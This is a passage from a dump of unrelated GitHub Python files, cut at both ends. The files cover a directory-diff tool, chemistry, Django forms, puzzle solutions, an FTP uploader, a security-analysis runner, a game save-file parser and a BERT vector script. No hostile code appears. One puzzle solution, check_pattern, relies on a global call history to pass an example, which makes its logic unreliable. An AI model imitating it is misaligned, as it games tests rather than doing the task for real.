为模糊配置,配置的话就不下载,跳过本次循环,进入下一循环\n for exclude in excludes:\n if match(filename, exclude):\n return True\n\n\ndef get_lines(file):\n fbytes = min(32, os.path.getsize(file))\n result = chardet.detect(open(file, 'rb').read(fbytes))\n encoding = result['encoding']\n try:\n with open(file, 'r', encoding=encoding, newline=\"\") as f:\n rtstr = f.readlines()\n except:\n rtstr = 'open failed'\n finally:\n return rtstr\n\n\nclass vscmp(object):\n def __init__(self, filepath=None):\n if filepath is None:\n self.cfg = ReadCfg().readcfg()\n else:\n self.cfg = ReadCfg().readcfg(filepath)\n self.rz_dir_pre = self.cfg[\"COMPARE\"][\"result_dir_pre\"] + time.strftime('%Y_%m_%d_%H%M%S')\n if not os.path.isdir(self.rz_dir_pre):\n os.makedirs(self.rz_dir_pre)\n self.mylog = logger(os.path.join(self.rz_dir_pre, \"syslog.log\"))\n\n def compare(self):\n self.mylog.info(\"版本对比--开始!\")\n left_dir = self.cfg[\"COMPARE\"][\"left_dir\"]\n right_dir = self.cfg[\"COMPARE\"][\"right_dir\"]\n ignore = self.cfg[\"COMPARE\"][\"dircmp.ignore\"]\n hide = self.cfg[\"COMPARE\"][\"dircmp.hide\"]\n\n dcmp = filecmp.dircmp(left_dir, right_dir, ignore, hide)\n self.compare_result_deal(dcmp)\n self.mylog.info(\"版本对比--结束!\")\n\n def compare_result_deal(self, dcmp):\n self.diff_file_deal(dcmp)\n\n for name in dcmp.left_only:\n self.mylog.info(\"只在左边: {}\".format(os.path.join(dcmp.left, name)))\n for name in dcmp.right_only:\n self.mylog.info(\"只在右边: {}\".format(os.path.join(dcmp.right, name)))\n for sub_dcmp in dcmp.subdirs.values():\n self.compare_result_deal(sub_dcmp)\n\n def diff_file_deal(self, dcmp):\n for name in dcmp.diff_files:\n left_file = os.path.join(dcmp.left, name)\n right_file = os.path.join(dcmp.right, name)\n\n if exclude_files(name, self.cfg[\"COMPARE\"][\"ignore\"]):\n self.mylog.info(\"忽略差异文件:{}\".format(left_file))\n continue\n\n # 创建目录\n tmp_dir1 = dcmp.left.replace(self.cfg[\"COMPARE\"][\"left_dir\"], '')\n if tmp_dir1.startswith(\"\\\\\"):\n tmp_dir = tmp_dir1.lstrip(\"\\\\\")\n rz_dir = os.path.join(self.rz_dir_pre, tmp_dir)\n try:\n # self.mylog.info(\"创建目录:{}\".format(rz_dir))\n os.makedirs(rz_dir)\n except:\n pass\n\n left_lines = get_lines(left_file)\n right_lines = get_lines(right_file)\n\n if left_lines == 'open failed':\n self.mylog.info(\"差异二进制文件:{file}\".format(file=left_file))\n else:\n self.mylog.info(\"差异文本文件:{file}\".format(file=left_file))\n context = difflib.context_diff(left_lines, right_lines, dcmp.left, dcmp.right,\n n=self.cfg[\"COMPARE\"][\"context_diff.number\"])\n for item in context:\n self.mylog.info(\" {}\".format(item.rstrip(\"\\n\")))\n html_context = difflib.HtmlDiff().make_file(left_lines, right_lines, left_file, right_file)\n html_fn = os.path.join(rz_dir, name + '.html')\n with open(html_fn, encoding='utf-8', mode='a+') as f:\n f.write(html_context)\n","repo_name":"caoyuanbaiyang/vscmp","sub_path":"vscmp.py","file_name":"vscmp.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28028189466","text":"from rdkit.Chem import AllChem\r\nfrom rdkit.Chem import ChemicalFeatures\r\nfrom rdkit import RDConfig\r\nfrom rdkit import DataStructs\r\nfrom rdkit import Chem\r\nimport numpy as np\r\nimport os\r\nfdefName = os.path.join(RDConfig.RDDataDir,'BaseFeatures.fdef')\r\nfactory = ChemicalFeatures.BuildFeatureFactory(fdefName)\r\n\r\nclass Observation:\r\n \"\"\"\r\n Allow the computer agent a to make a decision based on the molecule observations\r\n \"\"\"\r\n \r\n def __init__(self, mol):\r\n \"\"\"\r\n This is the constructor\r\n\r\n :param mol: The current molecule being observed\r\n :type mol: RWMol\r\n \"\"\"\r\n self.mol = mol\r\n self.observation = Chem.MolToSmiles(mol)\r\n self.info = []\r\n \r\n \r\n def getInfo(self):\r\n \"\"\"\r\n Get information about the molecule\r\n\r\n :return: morgen fingerprint bits and feature information both as numpy.Array objects\r\n :rtype: tuple\r\n \"\"\"\r\n self.info.clear()\r\n feats = factory.GetFeaturesForMol(self.mol)\r\n fp = AllChem.GetMorganFingerprintAsBitVect(self.mol,2,nBits=1024)\r\n fp_arr = np.zeros((1,))\r\n for y in feats:\r\n self.info.append(y.GetType())\r\n \r\n DataStructs.ConvertToNumpyArray(fp,fp_arr)\r\n self.bits = np.nonzero(fp_arr) \r\n return self.bits,self.info\r\n\r\n \r\n def getObservation(self):\r\n \"\"\"\r\n Gets the observations from the molecule\r\n\r\n :return: Smiles string of the current molecule\r\n :rtype: string\r\n \"\"\"\r\n self.observation = Chem.MolToSmiles(self.mol)\r\n return self.observation\r\n \r\n def update(self,mol):\r\n \"\"\"\r\n Updates the molecule being observed\r\n\r\n :param mol: The current molecule being observed\r\n :type mol: RWMol\r\n \"\"\"\r\n self.mol = mol ","repo_name":"kagisokgwahla/captone-molecule-env","sub_path":"capstone-molecule-environment-mirror-master/gym_molecule/envs/observation.py","file_name":"observation.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"30160207967","text":"\"\"\"\r\n\n\nCreate a function that checks if the sub-lists in a list adhere to the\nspecified pattern.\n\n### Examples\n\n check_pattern([[1, 1], [2, 2], [1, 1], [2, 2]], \"ABAB\") ➞ True\n \n check_pattern([[1, 2], [1, 3], [1, 4], [1, 2]], \"ABCA\") ➞ True\n \n check_pattern([[1, 2, 3], [1, 2, 3], [3, 2, 1], [3, 2, 1]], \"AABB\") ➞ True\n \n check_pattern([[8, 8, 8, 8], [7, 7, 7, 7], [6, 6, 6, 6], [5, 5, 5, 5]], \"ABCD\") ➞ True\n \n check_pattern([[8, 8, 8, 8], [7, 7, 7, 7], [6, 6, 6, 6], [5, 5, 5, 5]], \"DCBA\") ➞ True\n\n### Notes\n\n * The length of the pattern will always be the same as the length of the (main) list.\n * The pattern does not necessarily have to be alphabetically ordered (see last example).\n\n\"\"\"\r\n\nb=[]\ndef check_pattern(lst, pattern):\n import string as st\n global b \n st=iter(st.ascii_uppercase)\n a={}\n ls=''\n for i in lst :\n if str(i) not in a :\n a[str(i)]=next(st)\n ls=ls+a[str(i)]\n else :\n ls=ls+a[str(i)]\n if a in b :\n return ls[::-1]==pattern\n else : \n b.append(a)\n return ls==pattern\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"z9tnydD5Fix3g3mas_20.py","file_name":"z9tnydD5Fix3g3mas_20.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"38463027467","text":"from django import forms\nfrom .models import Function, Collaborator, Schedule\n\nclass FunctionForm(forms.ModelForm):\n class Meta:\n model = Function\n fields = ('name',)\n\n name = forms.CharField(\n max_length=200, \n required=True, \n widget=forms.TextInput(attrs={'class':'form-control'})\n )\n\n\nclass CollaboratorForm(forms.ModelForm):\n class Meta:\n model = Collaborator\n fields = ('name','birth_day', 'function', )\n\n name = forms.CharField(\n max_length=200, \n required=True, \n widget=forms.TextInput(attrs={'class':'form-control'})\n )\n birth_day = forms.DateField(\n widget=forms.widgets.DateInput(format=\"%d/%m/%Y\", attrs={'class':'form-control', 'type':'date'}),\n required=True)\n\n function = forms.ModelChoiceField(\n queryset=Function.objects.all(), \n widget=forms.Select(attrs={'class':'form-control'}), \n required=True)\n \n \nclass ScheduleForm(forms.ModelForm):\n class Meta:\n model = Schedule\n fields = ('name','date', 'collaborator', )\n\n name = forms.CharField(\n max_length=200, \n required=True, \n widget=forms.TextInput(attrs={'class':'form-control'})\n )\n date = forms.DateTimeField(\n widget=forms.widgets.DateInput( attrs={'class':'form-control', 'type':'date'}),\n required=True)\n\n collaborator = forms.ModelChoiceField(\n queryset=Collaborator.objects.all(), \n widget=forms.Select(attrs={'class':'form-control'}), \n required=True)\n \n ","repo_name":"lucasmangelo2/syscon","sub_path":"syscon/app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19167049620","text":"#Advent of Code 2021 Day 7\nfrom datetime import datetime\nstart = datetime.now()\n\nwith open(\"data.txt\") as file:\n crabShips = [int(x) for x in file.read().split(\",\")]\n\nfuelCosts = []\nfor possibleDepth in range(max(crabShips) + 1):\n fuelCosts.append(sum(range(possibleDepth+1)))\n\nresultsTask1 = []\nresultsTask2 = []\nfor depth in range(0, max(crabShips)):\n checkSumTask1 = 0\n checkSumTask2 = 0\n for crabShip in crabShips:\n checkSumTask1 += abs(depth - crabShip)\n # FIRST SOLUTION: 24 sek runtime: checkSumTask2 += sum(range(abs(number - depth)+1))\n checkSumTask2 += fuelCosts[abs(depth - crabShip)]\n resultsTask1.append(checkSumTask1)\n resultsTask2.append(checkSumTask2)\n\nprint(\"Task 1:\",min(resultsTask1))\nprint(\"Task 2:\",min(resultsTask2))\nprint(\"Runtime: \", datetime.now() - start)","repo_name":"petrlos/AoC_2021","sub_path":"07/07.py","file_name":"07.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18976266833","text":"import ftplib \nimport logging\nimport os\nfrom datetime import datetime\n\n#Allows the user to upload a file from thier local system.\ndef put_file(ftp, path, filename, upload_path):\n ret = (True, \"default\")\n \n #Has the user input the path to the file on their local machine.\n try:\n os.chdir(path)\n #correct = True\n except Exception as err:\n ret = (False, str(err))\n now = datetime.now()\n logging.error(now.strftime(\"%m/%d/%Y %H:%M:%S\") + \" ERROR: RESPONSE: \" + str(err))\n\n\n if (ret[0] == True):\n #Changes to the upload path.\n try:\n ftp.cwd(upload_path)\n #correct = True\n except Exception as err:\n ret = (False, str(err))\n now = datetime.now()\n logging.error(now.strftime(\"%m/%d/%Y %H:%M:%S\") + \" ERROR: RESPONSE: \" + str(err))\n \n\n \n if (ret[0] == True):\n # Uploads the file as a binary file this allows for more than text files.\n try:\n with open(filename, \"rb\") as file:\n resp = ftp.storbinary(f\"STOR {filename}\", file)\n ret = (True, str(resp))\n except Exception as err:\n ret = (False, str(err))\n now = datetime.now()\n logging.error(now.strftime(\"%m/%d/%Y %H:%M:%S\") + \" ERROR: RESPONSE: \" + str(err))\n\n \n return ret\n","repo_name":"CzerPDX/agile6","sub_path":"putfile.py","file_name":"putfile.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72995773530","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 13 18:11:13 2017\n\n@author: tz\n\"\"\"\n\ndef smallest_diff_pair(arr1, arr2):\n diff = float('inf')\n i = j = 0\n arr1 = sorted(arr1)\n arr2 = sorted(arr2)\n while i < len(arr1) and j < len(arr2):\n if arr1[i] <= arr2[j]:\n diff = min(diff, abs(arr1[i]-arr2[j]))\n i+=1\n else:\n diff = min(diff, abs(arr1[i]-arr2[j]))\n j+=1\n \n return diff \n\narr1 = [1,3,15,11,2]\narr2 = [23,127,235,19,8]\n\nprint(smallest_diff_pair(arr1, arr2))","repo_name":"anguillanneuf/bigO","sub_path":"78 smallest_diff_pair.py","file_name":"78 smallest_diff_pair.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30116234537","text":"\"\"\"\r\n\n\nYou are given a list of scores. The even-indexed numbers are your scores at\neach turn. The odd-indexed numbers are your opponent's scores.\n\nCreate a function that turns this list of scores into a list of who is\ncurrently winning.\n\nTo illustrate (You - `Y`, Opponent - `O`):\n\n Scores: [5, 15, 17, 35, 16, 40, 66, 12, 10, 9]\n \n Y scores: [5, 17, 16, 66, 10]\n O scores: [15, 35, 40, 12, 9]\n \n Y cumulative scores: [5, 22, 38, 104, 114]\n O cumulative scores: [15, 50, 90, 102, 111]\n \n Who is currently winning: [\"O\", \"O\", \"O\", \"Y\", \"Y\"]\n\n### Examples\n\n currently_winning([10, 10, 22, 30, 5, 40]) ➞ [\"T\", \"O\", \"O\"]\n \n currently_winning([5, 1, 2, 10]) ➞ [\"Y\", \"O\"]\n \n currently_winning([10, 10, 5, 5, 2, 2, 1, 3, 100, 5]) ➞ [\"T\", \"T\", \"T\", \"O\", \"Y\"]\n\n### Notes\n\nWrite \"T\" if there is a tie at that point in the game.\n\n\"\"\"\r\n\ndef currently_winning(scores):\n y = [scores[i] for i in range(len(scores)) if i%2==0]\n o = [scores[i] for i in range(len(scores)) if i%2!=0]\n ys=0\n os=0\n ret = []\n for i in range(len(y)):\n ys+=y[i]\n os+=o[i]\n ret.append('Y') if ys>os else ret.append('O') if os>ys else ret.append('T')\n return ret\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"epMcaSNzBFSF5uB89_8.py","file_name":"epMcaSNzBFSF5uB89_8.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2687983273","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n# 1. Import and test 3 of the functions from your functions exercise file.\n# Import each function in a different way:\n# -import the module and refer to the function with the . syntax\n# -use from to import the function directly\n# -use from and give the function a different name\n\n\n# In[ ]:\n\n\n# -import the module and refer to the function with the . syntax\nimport function_exercises\nfunction_exercises.is_vowel(\"a\")\n\n\n# In[ ]:\n\n\n# -use from to import the function directly\nfrom function_exercises import is_two\nis_two(2)\n\n\n# In[ ]:\n\n\n# -use from and give the function a different name\nfrom function_exercises import get_letter_grade\nget_letter_grade(85)\n\n\n# In[ ]:\n\n\n# For the following exercises, read about and use the itertools module from the standard library to help\n# you solve the problem.\n# 1. How many different ways can you combine the letters from \"abc\" with the numbers 1, 2, and 3?\nfrom itertools import product\n\nresults = [x for x in product('abc', '123')]\nprint(len(results))\n\n\n# In[ ]:\n\n\n# For the following exercises, read about and use the itertools module from the standard library to help\n# you solve the problem.\n# 2. How many different ways can you combine two of the letters from \"abcd\"?\nimport itertools\nperm = [x for x in itertools.permutations('abcd', 2)]\nprint(len(perm))\n\ncomb = [x for x in itertools.combinations('abcd', 2)]\nprint(len(comb))\n\n\n# In[2]:\n\n\n# Save this file as profiles.json inside of your exercises directory.\n# Use the load function from the json module to open this file, it will produce a list of dictionaries. \n\n\n# import json as instructed\nimport json\n\n# got this from link below to open file and assign is to a variable name\nwith open('profiles.json') as f:\n data = json.load(f)\n\n# visual to screen to verfiy data\nprint(data)\n\n# exobrain: https://www.programiz.com/python-programming/json\n\n\n# In[31]:\n\n\n# Using this data, write some code that calculates and outputs the following information:\n# Total number of users\n\ndef total_users(value):\n # create list of id from data\n id_list = [x[\"_id\"] for x in data]\n # return length of list to get # of users\n return(len(id_list))\n\ntotal_users(data)\n\n\n# In[ ]:\n\n\n# Number of active users\n\n# create list of id where active is True\nid_list = [x[\"_id\"] for x in data if x['isActive'] == True]\n# print length of list to get # of active users\nprint(len(id_list))\n\n\n# In[ ]:\n\n\n# Number of inactive users\n\n# create list of id where active is False\nid_list = [x[\"_id\"] for x in data if x['isActive'] == False]\n# print length of list to get # of active users\nprint(len(id_list))\n\n\n# In[ ]:\n\n\n# Grand total of balances for all users\n\ndef grand_total(value):\n # sum all balances\n balance = [x['balance'] for x in data]\n # strip $ from balance numbers\n rmchar = [x.lstrip(\"$\") for x in balance]\n # remove comma from numbers\n rmcomma = [x.replace(\",\", \"\")for x in rmchar]\n # convert numbers to float for addition\n num_bal = [float(x) for x in rmcomma]\n # return sum of all balances\n return(sum(num_bal))\n\ngrand_total(data)\n\n\n# In[ ]:\n\n\n# Average balance per user\n\n# use grand_total and total_users functions to calculate average balance, rounded for easier reading\navg_bal = grand_total(data) / total_users(data)\n# print result to screen to view\nprint(round(avg_bal, 2))\n\n\n# In[ ]:\n\n\n# User with the lowest balance\n\n# get list of all balances\nbalances = [x[\"balance\"] for x in data]\n# find minimum balance in list\nmin_bal = min(balances)\n# print result to screen to view\nprint(min_bal)\n\n\n# In[ ]:\n\n\n# User with the highest balance\n\n# get list of all balances\nbalances = [x[\"balance\"] for x in data]\n# find maximum balance in list\nmax_bal = max(balances)\n# print result to screen to view\nprint(max_bal)\n\n\n# In[ ]:\n\n\n# Most common favorite fruit\n\n# copy function from 101 exercises that counts items and returns total number, adapt to word\ndef mode(seq):\n max_count = (0, 0)\n for word in seq:\n occur = seq.count(word)\n if occur > max_count[0]:\n max_count = (occur, word)\n return max_count[1]\n\n# get list of all favorite fruits\nfav_fruit = [x[\"favoriteFruit\"] for x in data]\n# use above function to get most common fruit in list\nmost_common = mode(fav_fruit)\n# print result to screen to view\nprint(most_common)\n\n\n# In[ ]:\n\n\n# Least most common favorite fruit\n\n# copy function above that counts items and returns total number, adapt to least common\ndef mode_min(seq):\n # need float inf so start at highest when looking for min\n min_count = (float('inf'), float('inf'))\n # count number of times each word in list occurs if occurance count is least set that to min count\n for word in seq:\n occur = seq.count(word)\n if occur < min_count[0]:\n min_count = (occur, word)\n # return the min count position 2 that holds the name of the fruit with the least occurances\n return min_count[1]\n\n# get list of all favorite fruits\nfav_fruit = [x[\"favoriteFruit\"] for x in data]\n# use above function to get most common fruit in list\nleast_common = mode_min(fav_fruit)\n# print result to screen to view\nprint(least_common)\n\n\n# In[47]:\n\n\n# Total number of unread messages for all users\n\n# find where the number of unread messages in located in the data\n# get list of all greetings (where this info is located)\ngreeting_list = [x[\"greeting\"] for x in data]\n# create empty list to store message values later\nmessages_list = []\n\n# remove . ! and , from greeting\ngreeting_list = [greeting.replace(\".\", \"\") for greeting in greeting_list]\ngreeting_list = [greeting.replace(\",\", \"\") for greeting in greeting_list]\ngreeting_list = [greeting.replace(\"!\", \"\") for greeting in greeting_list]\n# split list on spaces so # messages will be in same index for all greetings\ngreeting_list = [greeting.split() for greeting in greeting_list]\n\n# get # of unread messages from string of greeting\nfor greeting in greeting_list:\n # get correct number and return as integer\n messages = int(greeting[5])\n # append integers to list so can sum\n messages_list.append(messages)\n\n # print result to screen to view\n print(\"Total unread messages =\", (sum(messages_list)))\n\n# exobrain:\n# https://www.geeksforgeeks.org/python-string-split/ \n# https://www.kite.com/python/answers/how-to-extract-integers-from-a-string-in-python\n\n","repo_name":"RyvynYoung/python_exercises","sub_path":"import_exercises.py","file_name":"import_exercises.py","file_ext":"py","file_size_in_byte":6354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6538355040","text":"\"\"\"Definitive Edition structure.\"\"\"\n\nfrom construct import (\n Struct, Int32ul, Float32l, Array, Padding, Flag, If,\n Byte, Int16ul, Bytes, Int32sl, Peek, Const, RepeatUntil,\n Int64ul, Computed\n)\n\nfrom mgz.enums import VictoryEnum, ResourceLevelEnum, AgeEnum, PlayerTypeEnum, DifficultyEnum\nfrom mgz.util import find_save_version\n\n# pylint: disable=invalid-name, bad-continuation\n\nde_string = Struct(\n Const(b\"\\x60\\x0A\"),\n \"length\"/Int16ul,\n \"value\"/Bytes(lambda ctx: ctx.length)\n)\n\nseparator = Const(b\"\\xa3_\\x02\\x00\")\n\nplayer = Struct(\n \"dlc_id\"/Int32ul,\n \"color_id\"/Int32sl,\n \"selected_color\"/Byte,\n \"selected_team_id\"/Byte,\n \"resolved_team_id\"/Byte,\n \"dat_crc\"/Bytes(8),\n \"mp_game_version\"/Byte,\n \"civ_id\"/Int32ul,\n \"ai_type\"/de_string,\n \"ai_civ_name_index\"/Byte,\n \"ai_name\"/de_string,\n \"name\"/de_string,\n \"type\"/PlayerTypeEnum(Int32ul),\n \"profile_id\"/Int32ul,\n Const(b\"\\x00\\x00\\x00\\x00\"),\n \"player_number\"/Int32sl,\n \"hd_rm_elo\"/If(lambda ctx: find_save_version(ctx) < 25.22, Int32ul),\n \"hd_dm_elo\"/If(lambda ctx: find_save_version(ctx) < 25.22, Int32ul),\n \"prefer_random\"/Flag,\n \"custom_ai\"/Flag,\n If(lambda ctx: find_save_version(ctx) >= 25.06, \"handicap\"/Bytes(8)),\n)\n\nstring_block = Struct(\n \"strings\"/RepeatUntil(lambda x, lst, ctx: 255 > lst[-1].crc > 0, Struct(\n \"crc\"/Int32ul,\n \"string\"/If(lambda ctx: ctx.crc == 0 or ctx.crc > 255, de_string)\n ))\n)\n\nde = \"de\"/Struct(\n \"build\"/If(lambda ctx: find_save_version(ctx) >= 25.22, Int32ul),\n \"timestamp\"/If(lambda ctx: find_save_version(ctx) >= 26.16, Int32ul),\n \"version\"/Float32l,\n \"interval_version\"/Int32ul,\n \"game_options_version\"/Int32ul,\n \"dlc_count\"/Int32ul,\n \"dlc_ids\"/Array(lambda ctx: ctx.dlc_count, Int32ul),\n \"dataset_ref\"/Int32ul,\n Peek(\"difficulty_id\"/Int32ul),\n DifficultyEnum(\"difficulty\"/Int32ul),\n \"selected_map_id\"/Int32ul,\n \"resolved_map_id\"/Int32ul,\n \"reveal_map\"/Int32ul,\n Peek(\"victory_type_id\"/Int32ul),\n VictoryEnum(\"victory_type\"/Int32ul),\n Peek(\"starting_resources_id\"/Int32ul),\n ResourceLevelEnum(\"starting_resources\"/Int32ul),\n \"starting_age_id\"/Int32ul,\n \"starting_age\"/AgeEnum(Computed(lambda ctx: ctx.starting_age_id - 2)),\n \"ending_age_id\"/Int32ul,\n \"ending_age\"/AgeEnum(Computed(lambda ctx: ctx.ending_age_id - 2)),\n \"game_type\"/Int32ul,\n separator,\n separator,\n \"speed\"/Float32l,\n \"treaty_length\"/Int32ul,\n \"population_limit\"/Int32ul,\n \"num_players\"/Int32ul,\n \"unused_player_color\"/Int32ul,\n \"victory_amount\"/Int32sl,\n separator,\n \"trade_enabled\"/Flag,\n \"team_bonus_disabled\"/Flag,\n \"random_positions\"/Flag,\n \"all_techs\"/Flag,\n \"num_starting_units\"/Byte,\n \"lock_teams\"/Flag,\n \"lock_speed\"/Flag,\n \"multiplayer\"/Flag,\n \"cheats\"/Flag,\n \"record_game\"/Flag,\n \"animals_enabled\"/Flag,\n \"predators_enabled\"/Flag,\n \"turbo_enabled\"/Flag,\n \"shared_exploration\"/Flag,\n \"team_positions\"/Flag,\n \"sub_game_mode\"/If(lambda ctx: find_save_version(ctx) >= 13.34, Int32ul),\n \"battle_royale_time\"/If(lambda ctx: find_save_version(ctx) >= 13.34, Int32ul),\n \"handicap\"/If(lambda ctx: find_save_version(ctx) >= 25.06, Flag),\n \"unk\"/If(lambda ctx: find_save_version(ctx) >= 50, Flag),\n separator,\n \"players\"/Array(lambda ctx: ctx.num_players if find_save_version(ctx) >= 37 else 8, player),\n Bytes(9),\n \"fog_of_war\"/Flag,\n \"cheat_notifications\"/Flag,\n \"colored_chat\"/Flag,\n \"empty_slots\"/If(lambda ctx: find_save_version(ctx) >= 37, Array(lambda ctx: 8 - ctx.num_players, Struct(\n \"i0x\"/Int32ul,\n \"i0a\"/Int32ul,\n \"i0b\"/Int32ul,\n \"s1\"/de_string,\n \"a2\"/Bytes(1),\n \"s2\"/de_string,\n \"s3\"/de_string,\n \"a3\"/Bytes(22),\n \"i1\"/Int32ul,\n \"i2\"/Int32ul,\n \"a4\"/Bytes(8),\n ))),\n separator,\n \"ranked\"/Flag,\n \"allow_specs\"/Flag,\n \"lobby_visibility\"/Int32ul,\n \"hidden_civs\"/Flag,\n \"matchmaking\"/Flag,\n \"spec_delay\"/If(lambda ctx: find_save_version(ctx) >= 13.13, Int32ul),\n \"scenario_civ\"/If(lambda ctx: find_save_version(ctx) >= 13.13, Byte),\n \"rms_strings\"/string_block,\n Bytes(8),\n \"other_strings\"/Array(20, string_block),\n \"num_sn\"/Int32ul,\n \"strategic_numbers\"/Array(lambda ctx: ctx.num_sn if find_save_version(ctx) >= 25.22 else 59, Int32sl),\n \"num_ai_files\"/Int64ul,\n \"ai_files\"/Array(lambda ctx: ctx.num_ai_files, Struct(\n Bytes(4),\n \"name\"/de_string,\n Bytes(4),\n )),\n If(lambda ctx: find_save_version(ctx) >= 25.02, Bytes(8)),\n \"guid\"/Bytes(16),\n \"lobby_name\"/de_string,\n If(lambda ctx: find_save_version(ctx) >= 25.22, Bytes(8)),\n \"modded_dataset\"/de_string,\n Bytes(19),\n If(lambda ctx: find_save_version(ctx) >= 13.13, Bytes(5)),\n If(lambda ctx: find_save_version(ctx) >= 13.17, Bytes(9)),\n If(lambda ctx: find_save_version(ctx) >= 20.06, Bytes(1)),\n If(lambda ctx: find_save_version(ctx) >= 20.16, Bytes(8)),\n If(lambda ctx: find_save_version(ctx) >= 25.06, Bytes(21)),\n If(lambda ctx: find_save_version(ctx) >= 25.22, Bytes(4)),\n If(lambda ctx: find_save_version(ctx) >= 26.16, Bytes(8)),\n If(lambda ctx: find_save_version(ctx) >= 37, Bytes(3)),\n If(lambda ctx: find_save_version(ctx) >= 50, Bytes(8)),\n de_string,\n Bytes(5),\n If(lambda ctx: find_save_version(ctx) >= 13.13, Byte),\n If(lambda ctx: find_save_version(ctx) < 13.17, Struct(\n de_string,\n Int32ul,\n Bytes(4), # usually zero\n )),\n If(lambda ctx: find_save_version(ctx) >= 13.17, Bytes(2)),\n \"ver37\"/If(lambda ctx: find_save_version(ctx) >= 37, Struct(\n Int32ul,\n Int32ul\n ))\n)\n","repo_name":"happyleavesaoc/aoc-mgz","sub_path":"mgz/header/de.py","file_name":"de.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"32"} +{"seq_id":"8103216808","text":"import os\nimport glob\nimport subprocess\nimport time\n\nuser = 'lables/'\ncustomPath = 'guilherme-andreuce-tcc/tcc/CryptoSASTRunner/'\napksPath = '/home/' + user + customPath + '/cryptoRunner/projects/apks/'\nlibScoutPath = '/home/' + user + customPath + '/libScout/'\nlibScoutlLogsPath = '/home/' + user + customPath + '/libScout/logs/'\nlibScoutJsonLogsPath = '/home/' + user + customPath + '/libScout/jsonlogs/'\ntccResults = '/home/' + user + customPath + '/tccResults/'\nlibScoutResultsJson = 'libscout-result/json'\ncryptoSASTRunnerPath = '/home/' + user + customPath\nsarifOutput = cryptoSASTRunnerPath + 'cryptoRunner/results/cryptoSarifOutput'\ncryptoguardSarifResults = 'cryptoguard-sarif'\nextension = 'apk'\n\nstart_time = time.time()\n\nos.chdir(sarifOutput)\ncrypto_results = [i for i in glob.glob('*.{}'.format('json'))]\nfor crypto_file in crypto_results:\n subprocess.call(['cp', crypto_file, tccResults + cryptoguardSarifResults])\n\nos.chdir(apksPath)\nall_filenames = [i for i in glob.glob('*.{}'.format(extension))]\nos.chdir(libScoutPath)\n\n\nfor file in all_filenames:\n subprocess.call(['java', '-jar', 'build/libs/LibScout.jar', '-o',\n 'match', '-a', 'build/libs/Android.jar', apksPath + file, '-d'])\n print(\"Analysis finished for project: \" + file)\n\nos.chdir(libScoutlLogsPath)\nsubprocess.call(['ruby', 'libscout-log-to-json.rb'])\n\n\nos.chdir(libScoutJsonLogsPath)\njson_filenames = [i for i in glob.glob('*.{}'.format('json'))]\nfor json_file in json_filenames:\n subprocess.call(['cp', json_file, tccResults + libScoutResultsJson])\n\n\nos.chdir(tccResults)\nsubprocess.call(['ruby', 'crypto_lib_merger.rb', 'scout'])\n\nprint(\"Analysis finished for: \")\nprint(all_filenames)\nprint(\"--- %s seconds ---\" % (time.time() - start_time))\n","repo_name":"streeg/tcc","sub_path":"CryptoSASTRunner/libScrapperRunnerScout.py","file_name":"libScrapperRunnerScout.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"40379469727","text":"import tkinter as tk\r\nfrom tkinter import ttk\r\nfrom PIL import Image, ImageTk\r\nimport sound\r\nclass Panel(ttk.Button):\r\n bright:bool = False\r\n imgName = \"./buttonImageTest.png\"\r\n\r\n def __init__ (self, master=None, text=None, image=None, name=None, padding=None):\r\n super().__init__(master)\r\n self.configure(command=self.callfor)\r\n if (text != None):\r\n self.configure(text=text)\r\n if (image != None):\r\n self.imgName = image\r\n img = Image.open(self.imgName)\r\n img = ImageTk.PhotoImage(img)\r\n self.configure(image=img)\r\n #if (name != None):\r\n # self.configure(name=name)\r\n if (padding != None):\r\n self.configure(padding=padding)\r\n\r\n def callfor(self): # ボタンが押されたときに実行される処理 (panelが押されたパネルを示す)\r\n def inner(): # 実際に呼び出されるのはこっち (この中に処理を記述)\r\n self.configure(text=\"pushd.\")\r\n return inner\r\n\r\n #def refresh(): #ボタンのプロパティを反映する関数","repo_name":"chihatank/jubeat","sub_path":"jubeat-add-alarm/Panel.py","file_name":"Panel.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"ja","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"6025977288","text":"import hashlib\nimport os\nimport random\n\nfrom tqdm import tqdm\nimport nltk\nimport torch\n\nfrom .args import read_args\n\n\ndef main():\n config = read_args(default_config=\"confs/bert.json\")\n with open(config.input_file) as f:\n content = f.read()\n sentences = nltk.sent_tokenize(content)\n random.shuffle(sentences)\n print(f\"Read {len(sentences)} sentences.\")\n vecs = []\n for sent in tqdm(sentences):\n h = hashlib.md5(sent.encode()).hexdigest()\n if config.lookup_word not in sent.lower():\n continue\n path = os.path.join(config.output_folder, h)\n if not os.path.exists(path):\n continue\n try:\n toks, tok_vecs = 